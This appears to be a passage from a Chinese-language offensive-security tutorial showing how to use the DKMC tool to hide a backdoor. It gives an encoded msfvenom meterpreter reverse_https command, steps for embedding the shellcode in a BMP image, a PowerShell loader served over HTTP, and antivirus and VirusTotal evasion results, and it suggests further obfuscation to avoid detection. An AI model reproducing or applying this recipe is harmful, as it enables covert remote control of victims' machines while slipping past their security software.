四、利用DKMC生成后门1、先利用Msf生成raw格式的shellcode,稍微编码了一下
- msfvenom -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -b "\x00" -i 5 -a x86 -f raw -o /root/test15.raw
复制代码
2、在主菜单中选择sc,然后设置source为/root/test15.raw,再执行run生成shellcode。
复制一下生成的shellcode,输入exit退回到主菜单。
3、在主菜单中选择gen,然后设置shellcode为上一步中生成的shellcode。
其他默认即可,执行run生成图像。
看到生成了output-1577907077.bmp图像文件,输入exit退回到主菜单。
4、在主菜单中选择ps,设置url地址,这个url地址就是web分发图像文件的地址。
使用命令set url
,然后执行run生成powershell执行脚本。 复制一下生成的ps代码,输入exit退回到主菜单。
5、最后一步,在主菜单中选择web,使用默认80端口,执行run即可。
访问虚拟机的80端口
图像可以正常打开
6、在我的测试机器上执行第4步生成的ps代码,不开杀软的时候可正常上线
我将ps执行代码中的-w hidden先去掉,这样可以看得直观一些
7、打开杀软进行测试
静态查杀都通过
在执行powershell代码时,火绒和360卫士会拦截报警,360杀毒没有反应
virustotal.com上BMP文件的查杀率为5/55,查杀出来为BMP木马
virustotal.com上ps代码的查杀率为8/55,判断ps下载行为
。
四、小结DKMC主要把shellcode注入到bmp图像中,然后使用powershell来执行其中的shellcode,但是很多杀软都会监powershell的执行动作,所以virustotal.com的静态检测不足以说明什么。其实还可以进一步对ps执行代码进行混淆免杀,这一点后续文章还会涉及这里就不展开说了。
参考